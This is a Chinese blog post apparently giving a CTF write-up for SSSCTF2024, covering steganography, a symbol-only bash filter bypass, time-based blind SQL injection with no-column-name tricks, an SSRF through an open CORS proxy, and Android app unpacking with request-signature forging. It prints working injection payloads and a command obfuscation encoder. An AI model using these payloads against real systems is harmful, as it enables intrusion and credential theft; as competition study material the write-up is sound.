
<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta charset="utf-8" />
    <title>SSSCTFwp-Dyinglight | Live For Code</title>
    <meta name="author" content="Live For Code" />
    <meta name="description" content="" />
    <meta name="keywords" content="" />
    <meta
        name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"
    />
    <link rel="icon" href="/images/avatar.jpg" />
    <link rel="preconnect" href="https://s4.zstatic.net" />
<script src="https://s4.zstatic.net/ajax/libs/vue/3.3.7/vue.global.prod.min.js"></script>
<link rel="stylesheet" href="https://s4.zstatic.net/ajax/libs/font-awesome/6.4.2/css/all.min.css" />
<link rel="preconnect" href="https://fonts.googleapis.cn" />
<link rel="preconnect" href="https://fonts.gstatic.cn" crossorigin />
<link
    rel="stylesheet"
    href="https://fonts.googleapis.cn/css2?family=Fira+Code:wght@400;500;600;700&family=Lexend:wght@400;500;600;700;800;900&family=Noto+Sans+SC:wght@400;500;600;700;800;900&display=swap"
/>
<script> const mixins = {}; </script>

<script src="https://polyfill.alicdn.com/v3/polyfill.min.js?features=default"></script>


<script src="https://s4.zstatic.net/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
<script src="https://s4.zstatic.net/ajax/libs/highlightjs-line-numbers.js/2.8.0/highlightjs-line-numbers.min.js"></script>
<link
    rel="stylesheet"
    href="https://s4.zstatic.net/ajax/libs/highlight.js/11.9.0/styles/github.min.css"
/>
<script src="/js/lib/highlight.js"></script>



<script src="/js/lib/preview.js"></script>









<link rel="stylesheet" href="/css/main.css" />

<meta name="generator" content="Hexo 7.1.1"></head>
<body>
    <div id="layout">
        <transition name="fade">
            <div id="loading" v-show="loading">
                <div id="loading-circle">
                    <h2>LOADING</h2>
                    <p>加载过慢请开启缓存 浏览器默认开启</p>
                    <img src="/images/loading.gif" />
                </div>
            </div>
        </transition>
        <div id="menu" :class="{ hidden: hiddenMenu, 'menu-color': menuColor}">
    <nav id="desktop-menu">
        <a class="title" href="/">
            <span>LIVE FOR CODE</span>
        </a>
        
        <a href="/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;Home</span>
        </a>
        
        <a href="/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;About</span>
        </a>
        
        <a href="/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;Archives</span>
        </a>
        
        <a href="/categories">
            <i class="fa-solid fa-bookmark fa-fw"></i>
            <span>&ensp;Categories</span>
        </a>
        
        <a href="/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;Tags</span>
        </a>
        
    </nav>
    <nav id="mobile-menu">
        <div class="title" @click="showMenuItems = !showMenuItems">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;LIVE FOR CODE</span>
        </div>
        <transition name="slide">
            <div class="items" v-show="showMenuItems">
                
                <a href="/">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-house fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Home</div>
                    </div>
                </a>
                
                <a href="/about">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-id-card fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">About</div>
                    </div>
                </a>
                
                <a href="/archives">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-box-archive fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Archives</div>
                    </div>
                </a>
                
                <a href="/categories">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-bookmark fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Categories</div>
                    </div>
                </a>
                
                <a href="/tags">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-tags fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Tags</div>
                    </div>
                </a>
                
            </div>
        </transition>
    </nav>
</div>
<transition name="fade">
    <div id="menu-curtain" @click="showMenuItems = !showMenuItems" v-show="showMenuItems"></div>
</transition>

        <div id="main" :class="loading ? 'into-enter-from': 'into-enter-active'">
            <div class="article">
    <div>
        <h1>SSSCTFwp-Dyinglight</h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <i class="fa-solid fa-calendar fa-fw"></i>
            </span>
            2024/4/27
        </span>
        
        
    </div>
    
    <div class="content" v-pre>
        <h1 id="SSSCTF2024-wp-Dyinglight"><a href="#SSSCTF2024-wp-Dyinglight" class="headerlink" title="SSSCTF2024 wp -Dyinglight"></a>SSSCTF2024 wp -Dyinglight</h1><h2 id="crypto"><a href="#crypto" class="headerlink" title="crypto"></a>crypto</h2><h3 id="原神"><a href="#原神" class="headerlink" title="原神"></a>原神</h3><p>flag{yuanshenqidong} 蒙德文字</p>
<h2 id="reverse"><a href="#reverse" class="headerlink" title="reverse"></a>reverse</h2><h3 id="check-in"><a href="#check-in" class="headerlink" title="check in"></a>check in</h3><p>ida进去就能看到flag</p>
<p><img src="/../images/sssctf/QQ%E6%88%AA%E5%9B%BE20240427091501.png"></p>
<h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><h3 id="1-ravenfield"><a href="#1-ravenfield" class="headerlink" title="1.ravenfield"></a>1.ravenfield</h3><p><img src="/../images/sssctf/2.png"></p>
<p>﻿‎下载了个编码的插件，发现utf-8编码会显示you win，但是源代码中间空了很多点点，把这些点点复制到浏览器，发现了这篇文章</p>
<p>﻿‏<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_38805084/article/details/102682864">https://blog.csdn.net/qq_38805084/article/details/102682864</a></p>
<p>0‍‍宽字节隐写，﻿<a target="_blank" rel="noopener" href="https://yuanfux.github.io/zero-width-web/%E8%BF%99%E4%B8%AA%E2%80%8C%E7%BD%91%E7%AB%99%E5%8F%AF%E4%BB%A5%E8%A7%A3%E5%AF%86%EF%BC%8C%E6%8A%8Ayou">https://yuanfux.github.io/zero-width-web/这个‌网站可以解密，把you</a> win复制进来解密即可</p>
<p>﻿‎‍﻿﻿‍﻿‎<img src="/../images/sssctf/3.png">‏‍﻿‌‌‎‍﻿﻿‏‍﻿‎﻿‍﻿﻿‎‏‌‎﻿‍﻿‎﻿‏‏‌‎‍‍﻿‎﻿‎‍‌‌﻿﻿‏﻿﻿‎‏‏‎‎</p>
<p>ps:游戏真好玩)</p>
<h3 id="2-weirdbash-复现"><a href="#2-weirdbash-复现" class="headerlink" title="2.weirdbash(复现)"></a>2.weirdbash(复现)</h3><p>dutctf获得一长串提示</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">+-!?$%&amp;*+-!?$%&amp;*+-!?$%&amp;*+-!?$%&amp;*+-!?$%&amp;*+-!?$%&amp;*+-!?$%&amp;*+-!?$%&amp;*</span><br><span class="line">noob-noob?noob-noob!noob$noob%noob-noob!noob%noob*noob-noob!noob*noob-noob!noob?noob&amp;noob*noob-noob!noob%noob*noob!noob-noob!noob%noob&amp;noob*noob-noob!noob$noob%noob&amp;noob*noob!noob-noob!noob?noob%noob-noob!noob$noob%noob&amp;noob*noob!noob-noob!noob?noob%noob-noob!noob$noob-noob!noob%noob*noob!noob!noob&amp;noob!noob$noob%noob&amp;noob*noob-noob!noob$noob%noob&amp;noob-noob!noob$noob%noob&amp;noob*noob-noob!noob$noob%noob&amp;noob*noob-noob!noob&amp;noob!noob&amp;noob!noob-noob!noob?noob&amp;noob-noob!noob$noob%noob&amp;noob*noob-noob!noob?noob%noob*noob-noob!noob?noob%noob-noob!noob%noob*noob!noob-noob!noob?noob%noob-noob!noob$noob%noob&amp;noob*noob!noob-noob!noob&amp;noob*noob-noob!noob*noob-noob!noob?noob-noob!noob?noob%noob-noob!noob?noob%noob*noob-noob!noob?noob&amp;noob-noob!noob%noob*noob!noob-noob!noob?noob%noob-noob!noob$noob-noob!noob%noob*noob!noob-noob!noob%noob&amp;noob-noob!noob$noob%noob-noob!noob*noob-noob!noob%noob&amp;noob*noob!noob$noob%noob&amp;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">+-!? $%&amp;* 是标准顺序1111 1111</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">noob_encode</span>(<span class="params">input_string</span>):</span><br><span class="line">    encodeed_string = <span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">for</span> char <span class="keyword">in</span> input_string:</span><br><span class="line">        ascii_value = <span class="built_in">ord</span>(char)</span><br><span class="line">        binary_representation = <span class="string">&#x27;&#123;0:08b&#125;&#x27;</span>.<span class="built_in">format</span>(ascii_value)</span><br><span class="line">        encodeed_char = <span class="string">&quot;&quot;</span></span><br><span class="line">        <span class="keyword">for</span> bit, operator <span class="keyword">in</span> <span class="built_in">zip</span>(binary_representation, [<span class="string">&#x27;noob+&#x27;</span>, <span class="string">&#x27;noob-&#x27;</span>, <span class="string">&#x27;noob!&#x27;</span>, <span class="string">&#x27;noob?&#x27;</span>, <span class="string">&#x27;noob$&#x27;</span>, <span class="string">&#x27;noob%&#x27;</span>, <span class="string">&#x27;noob&amp;&#x27;</span>, <span class="string">&#x27;noob*&#x27;</span>]):</span><br><span class="line">            <span class="keyword">if</span> bit == <span class="string">&#x27;1&#x27;</span>:</span><br><span class="line">                encodeed_char += operator</span><br><span class="line">        encodeed_string += encodeed_char</span><br><span class="line">    <span class="keyword">return</span> encodeed_string</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">noob_decode</span>(<span class="params">encodeed_string</span>):</span><br><span class="line">    decodeed_string = <span class="string">&quot;&quot;</span></span><br><span class="line">    i = <span class="number">0</span></span><br><span class="line">    <span class="keyword">while</span> i &lt; <span class="built_in">len</span>(encodeed_string):</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            check_valid_noob_string(encodeed_string[i:])</span><br><span class="line">            decodeed_char = <span class="string">&quot;&quot;</span></span><br><span class="line">            <span class="keyword">for</span> operator <span class="keyword">in</span> [<span class="string">&#x27;noob+&#x27;</span>, <span class="string">&#x27;noob-&#x27;</span>, <span class="string">&#x27;noob!&#x27;</span>, <span class="string">&#x27;noob?&#x27;</span>, <span class="string">&#x27;noob$&#x27;</span>, <span class="string">&#x27;noob%&#x27;</span>, <span class="string">&#x27;noob&amp;&#x27;</span>, <span class="string">&#x27;noob*&#x27;</span>]:</span><br><span class="line">                <span class="keyword">if</span> encodeed_string.startswith(operator, i):</span><br><span class="line">                    decodeed_char += <span class="string">&#x27;1&#x27;</span></span><br><span class="line">                    i += <span class="built_in">len</span>(operator)</span><br><span class="line">                <span class="keyword">else</span>:</span><br><span class="line">                    decodeed_char += <span class="string">&#x27;0&#x27;</span></span><br><span class="line">            ascii_value = <span class="built_in">int</span>(decodeed_char, <span class="number">2</span>)  <span class="comment"># 转换为2进制</span></span><br><span class="line">            decodeed_string += <span class="built_in">chr</span>(ascii_value)</span><br><span class="line">        <span class="keyword">except</span> DecodeError <span class="keyword">as</span> e:</span><br><span class="line">            <span class="built_in">print</span>(e)</span><br><span class="line">            <span class="keyword">raise</span> DecodeError</span><br><span class="line">    <span class="keyword">return</span> decodeed_string</span><br></pre></td></tr></table></figure>

<p>根据完整的加解密代码，逻辑是先把字符串ascii转化为八位二进制(例如0000 0000)，然后分别用<code>&#39;noob+&#39;, &#39;noob-&#39;, &#39;noob!&#39;, &#39;noob?&#39;, &#39;noob$&#39;, &#39;noob%&#39;, &#39;noob&amp;&#39;, &#39;noob*&#39;</code>去替换这八个数字中的1，得到加密的字符串</p>
<p>解密的逻辑就是把noob串遍历，有对应的字符就加1，没有就加0，得到二进制串，再翻译为ascii码即可</p>
<p>解密后的结果为：Please go to the “&#x2F;noob” route to capture the flag.</p>
<p>进入&#x2F;noob路由，经过测试过滤了所有的字母数字，还有&amp;,&#x3D;,~,_</p>
<p><img src="/../images/sssctf/bash%E8%BF%87%E6%BB%A4.PNG"></p>
<p>自己做题的时候一直在用异或绕过的方向，但是命令似乎并不会被解析</p>
<p>利用脚本绕过</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">enc</span>(<span class="params">cmd</span>):</span><br><span class="line">    <span class="built_in">str</span> = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">for</span> cmdx <span class="keyword">in</span> cmd:</span><br><span class="line">        <span class="built_in">str</span> += <span class="string">f&#x27;\\\\$(($((1&lt;&lt;1))#<span class="subst">&#123;<span class="built_in">bin</span>(<span class="built_in">int</span>((<span class="built_in">oct</span>(<span class="built_in">ord</span>(cmdx)))[<span class="number">2</span>:]))[<span class="number">2</span>:]&#125;</span>))&#x27;</span></span><br><span class="line">    ct = <span class="built_in">str</span>.replace(<span class="string">&#x27;1&#x27;</span>, <span class="string">&#x27;$&#123;##&#125;&#x27;</span>).replace(<span class="string">&#x27;0&#x27;</span>, <span class="string">&#x27;$&#123;#&#125;&#x27;</span>)</span><br><span class="line"></span><br><span class="line">    ct = <span class="string">&#x27;$&#123;!#&#125;&lt;&lt;&lt;$&#123;!#&#125;\\&lt;\\&lt;\\&lt;\\$\\\&#x27;&#x27;</span> + ct + <span class="string">&#x27;\\\&#x27;&#x27;</span></span><br><span class="line">    charset = <span class="built_in">set</span>()</span><br><span class="line">    <span class="keyword">for</span> ctx <span class="keyword">in</span> ct:</span><br><span class="line">        <span class="keyword">if</span> ctx.isprintable() <span class="keyword">and</span> ctx <span class="keyword">not</span> <span class="keyword">in</span> charset:</span><br><span class="line">            charset.add(ctx)</span><br><span class="line">    <span class="keyword">return</span> ct</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(enc(<span class="string">&quot;cat /flag&quot;</span>))</span><br></pre></td></tr></table></figure>

<p><code>$&#123;!#&#125;&lt;&lt;&lt;$&#123;!#&#125;\&lt;\&lt;\&lt;\$\&#39;\\$(($(($&lt;&lt;$))#$$$$$$))\\$(($(($&lt;&lt;$))#$$$$$))\\$(($(($&lt;&lt;$))#$$$$$))\\$(($(($&lt;&lt;$))#$$$$&lt;&lt;$))#$$$$$))\\$(($(($&lt;&lt;$))#$$$$$$&lt;&lt;$))#$$$$$$&lt;&lt;$))#$$$$$))\\$(($(($&lt;&lt;$))#$$$$$$))\&#39;</code></p>
<p>加密成noob再执行即可(多等会儿)</p>
<p>本质上是利用$#进行构造，<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/12242?time__1311=mqmhD5YIMD7GkDlc+EH4iuPNbmxG=DuYD&alichlgref=https://cn.bing.com/#toc-0">参考文章</a></p>
<h3 id="3-app-没做出来"><a href="#3-app-没做出来" class="headerlink" title="3.app(没做出来)"></a>3.app(没做出来)</h3><p>扫描到config：{“key”:”quOKHlGWut9iJUFvDi0CoKwqN1dw0z4zsul5IGdvvpc&#x3D;”,”iv”:”nsmz&#x2F;N5vMhnUaF&#x2F;hSvAP8w&#x3D;&#x3D;”}</p>
<p>gallery:[{“id”:1,”url”:”&#x2F;img&#x2F;1.jpg”},{“id”:2,”url”:”&#x2F;img&#x2F;2.jpg”},{“id”:3,”url”:”&#x2F;img&#x2F;3.png”}]</p>
<h3 id="4-gpt-复现"><a href="#4-gpt-复现" class="headerlink" title="4.gpt(复现)"></a>4.gpt(复现)</h3><p>首先是sql时间盲注入，<code>username=1&amp;password=1&#39;+||+if(ascii(substr(database(),1))=115,sleep(2),1)%23</code></p>
<p>注出数据库名为sssctf2024_db</p>
<p>由于or被ban了，用</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">sys.schema_table_statistics_with_buffer</span><br><span class="line">sys.x$schema_flattened_keys</span><br><span class="line">schema_auto_increment_columns#该视图的作用简单来说就是用来对表自增ID的监控,可以通过该视图获取数据库的表名信息。</span><br><span class="line">schema_table_statistics_with_buffer,x$schema_table_statistics_with_buffer<span class="operator">/</span><span class="operator">/</span>没有自增数据</span><br><span class="line">mysql.innodb_table_stats、mysql.innodb_table_index</span><br></pre></td></tr></table></figure>

<p>可以替换information_schema，得到表名<code>sssctf2024_users</code>(这些表没有列名)</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username<span class="operator">=</span><span class="number">1</span><span class="operator">&amp;</span>password<span class="operator">=</span><span class="number">1</span><span class="string">&#x27;+||+if(ascii(substr((select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=&#x27;</span>sssctf2024_db<span class="string">&#x27; limit 0,1),1))=115,sleep(5),0)%23</span></span><br></pre></td></tr></table></figure>

<p>查列名，可以使用无列名注入</p>
<p><code>select 1,2,3  union select * from sssctf2024_users</code>会产生一个虚拟表(必须保证列数正确)</p>
<p>只要给虚拟表取一个别名n，即可查询其中的数据，下面查询了第二列的数据</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> 反引号<span class="number">2</span>反引号 <span class="keyword">from</span> (<span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users)n;</span><br></pre></td></tr></table></figure>

<p>在反引号被过滤时还可以使用给列起别名的方式查询</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> b <span class="keyword">from</span> (<span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span> <span class="keyword">as</span> b,<span class="number">3</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users)n;</span><br></pre></td></tr></table></figure>

<p>还可以使用<code>表名.列名</code>这种形式，n是我们给虚拟表起的别名</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> n<span class="number">.2</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users)n;</span><br></pre></td></tr></table></figure>

<p>故可以用</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username<span class="operator">=</span><span class="number">1</span><span class="operator">&amp;</span>password<span class="operator">=</span><span class="number">1</span><span class="string">&#x27;+||+if(ascii(substr((select n.2 from (select 1,2,3 union select * from sssctf2024_users)n limit 0,1),1))=115,sleep(5),0)%23</span></span><br></pre></td></tr></table></figure>

<p>查到列名为username,password，注出数据</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username<span class="operator">=</span><span class="number">1</span><span class="operator">&amp;</span>password<span class="operator">=</span><span class="number">1</span><span class="string">&#x27;+||+if(ascii(substr((select username from sssctf2024_db.sssctf2024_users limit 0,1),1))=115,sleep(5),0)%23</span></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Scr1w_admin,sssctf2024_P@ssvv0rd</span><br></pre></td></tr></table></figure>

<p>登陆进去发现</p>
<p><img src="/../images/sssctf/gpt.png"></p>
<p>flag生成的是假的，next-gpt能搜索到一个ssrf漏洞</p>
<p>但是，有一些暴露的服务器端点。其中一个端点位于&#x2F;API&#x2F;cors，它的功能设计为开放代理，允许未经身份验证的用户通过它发送任意HTTP请求。添加此端点似乎是为了支持将客户端聊天数据保存到WebDAV服务器。此端点的存在是一种反模式：它允许客户端绕过内置的浏览器保护，通过服务器端端点访问跨域资源。</p>
<p>于是访问<a target="_blank" rel="noopener" href="http://210.30.97.133:10181/api/cors/http/scr1wgpt-web/generator%E5%8D%B3%E5%8F%AF%E6%8B%BF%E5%88%B0%E7%9C%9F%E6%AD%A3%E7%9A%84flag">http://210.30.97.133:10181/api/cors/http/scr1wgpt-web/generator即可拿到真正的flag</a></p>
<h3 id="5-app"><a href="#5-app" class="headerlink" title="5.app"></a>5.app</h3><p><img src="/../images/sssctf/app-1.png"></p>
<p>360加固，用frida-dexdump脱壳</p>
<p>前台模拟器挂着app，开启adb中的frida</p>
<p><img src="/../images/sssctf/7.png" alt="!(../images/sssctf/6.png)"></p>
<p><img src="/../images/sssctf/8.png"></p>
<p>生成了一个文件夹，把里面的dex文件拖入jadx</p>
<p><img src="/../images/sssctf/9.png"></p>
<p>再用fiddler抓包,抓到config的包</p>
<p><img src="/../images/sssctf/10.png"></p>
<p>{“key”:”khcYuxRprjYyRVY71OK6RLSi2jn2ljd7vkm+VqDAgRk&#x3D;”,”iv”:”bhT3FXFaimOl80uvAk92+A&#x3D;&#x3D;”}</p>
<p><img src="/../images/sssctf/11.png"></p>
<p>点击个人信息抓到这个包，直接访问<a target="_blank" rel="noopener" href="http://210.30.97.133:10055/service/m/app/info?uid=-1">http://210.30.97.133:10055/service/m/app/info?uid=-1</a></p>
<p><img src="/../images/sssctf/12.png"></p>
<p>得知访问数据是要签名的，签名需要config里的key和iv，用java签名的AES加密，发包</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> javax.crypto.Cipher;</span><br><span class="line"><span class="keyword">import</span> javax.crypto.spec.SecretKeySpec;</span><br><span class="line"><span class="keyword">import</span> javax.crypto.spec.IvParameterSpec;</span><br><span class="line"><span class="keyword">import</span> java.security.MessageDigest;</span><br><span class="line"><span class="keyword">import</span> java.util.Base64;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Main</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">String</span> <span class="variable">key</span> <span class="operator">=</span> <span class="string">&quot;khcYuxRprjYyRVY71OK6RLSi2jn2ljd7vkm+VqDAgRk=&quot;</span>; <span class="comment">// 替换为你的key</span></span><br><span class="line">        <span class="type">String</span> <span class="variable">iv</span> <span class="operator">=</span> <span class="string">&quot;bhT3FXFaimOl80uvAk92+A==&quot;</span>; <span class="comment">// 替换为你的iv</span></span><br><span class="line">        <span class="type">String</span> <span class="variable">data</span> <span class="operator">=</span> <span class="string">&quot;uid=20&amp;timestamp=1&amp;a=2&amp;nonce=3&quot;</span>; <span class="comment">// 替换为你的数据</span></span><br><span class="line"></span><br><span class="line">        <span class="type">Cipher</span> <span class="variable">cipher</span> <span class="operator">=</span> Cipher.getInstance(<span class="string">&quot;AES/CBC/PKCS5Padding&quot;</span>);</span><br><span class="line">        cipher.init(Cipher.ENCRYPT_MODE, <span class="keyword">new</span> <span class="title class_">SecretKeySpec</span>(Base64.getDecoder().decode(key), <span class="string">&quot;AES&quot;</span>), <span class="keyword">new</span> <span class="title class_">IvParameterSpec</span>(Base64.getDecoder().decode(iv)));</span><br><span class="line">        <span class="type">byte</span>[] encrypted = cipher.doFinal(data.getBytes());</span><br><span class="line"></span><br><span class="line">        <span class="type">MessageDigest</span> <span class="variable">md</span> <span class="operator">=</span> MessageDigest.getInstance(<span class="string">&quot;MD5&quot;</span>);</span><br><span class="line">        <span class="type">byte</span>[] digest = md.digest(encrypted);</span><br><span class="line"></span><br><span class="line">        <span class="type">StringBuilder</span> <span class="variable">sb</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">StringBuilder</span>();</span><br><span class="line">        <span class="keyword">for</span> (<span class="type">byte</span> b : digest) &#123;</span><br><span class="line">            sb.append(String.format(<span class="string">&quot;%02x&quot;</span>, b));</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="type">String</span> <span class="variable">sign</span> <span class="operator">=</span> sb.toString();</span><br><span class="line">        System.out.println(<span class="string">&quot;Generated sign: &quot;</span> + sign);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="/../images/sssctf/14.png"></p>
<p>做到这里发现uid是无法直接访问其他数据的，看了wp上通过逆向分析可以发现rank路由</p>
<p><img src="/../images/sssctf/15.png"></p>
<p>拿到数据，发现最后一条数据<code>&#123;&quot;id&quot;:6660,&quot;institute&quot;:&quot;DUTCTF&quot;,&quot;name&quot;:&quot;福来阁&quot;,&quot;points&quot;:40&#125;</code></p>
<p>这里可以猜测是visitor的问题，根据逆向的代码(这里直接贴wp的图片了，自己太菜审计不出来)，得知有个isVisitor参数</p>
<p><img src="/../images/sssctf/16.png"></p>
<p>构造url访问，记得这里的签名也要加上isVisitor</p>
<p><img src="/../images/sssctf/17.png"></p>
<p>千辛万苦终于拿到flag了</p>

    </div>
    
    
    
    
    
    
    
</div>

            <footer id="footer">
    <div id="footer-wrap">
        <div>
            &copy;
            2022 - 2024 Live For Code
            <span id="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            &commat;Live For Code
        </div>
        <div>
            Based on the <a target="_blank" rel="noopener" href="https://hexo.io">Hexo Engine</a> &amp;
            <a target="_blank" rel="noopener" href="https://github.com/theme-particlex/hexo-theme-particlex">ParticleX Theme</a>
        </div>
        
    </div>
</footer>

        </div>
        
        <transition name="fade">
            <div id="preview" ref="preview" v-show="previewShow">
                <img id="preview-content" ref="previewContent" />
            </div>
        </transition>
        
    </div>
    <script src="/js/main.js"></script>
    
    




    
</body>
</html>
